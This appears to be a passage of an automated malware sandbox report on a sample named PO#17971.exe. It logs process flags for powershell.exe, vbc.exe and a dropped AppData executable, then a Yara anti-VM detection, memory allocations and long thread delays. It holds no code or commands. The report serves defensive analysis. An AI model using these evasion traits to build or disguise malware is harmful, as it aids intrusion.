Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: PO#17971.exe PID: 428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TZRtlifudvO.exe PID: 7252, type: MEMORYSTR

Source: C:\Users\user\Desktop\PO#17971.exe	Memory allocated: 1170000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Memory allocated: 2C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Memory allocated: 2960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Memory allocated: 8DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Memory allocated: 9DB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Memory allocated: 9FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO#17971.exe	Memory allocated: AFB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Memory allocated: 7000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Memory allocated: 71C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Memory allocated: 91C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Memory allocated: 2240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Memory allocated: 23D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Memory allocated: 43D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Memory allocated: 8190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Memory allocated: 9190000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Memory allocated: 9380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Memory allocated: A380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Memory allocated: 6420000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Memory allocated: 6A30000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Memory allocated: 6440000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

9_2_004019F0

Source: C:\Users\user\Desktop\PO#17971.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599779	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599603	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599483	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599374	Jump to behavior
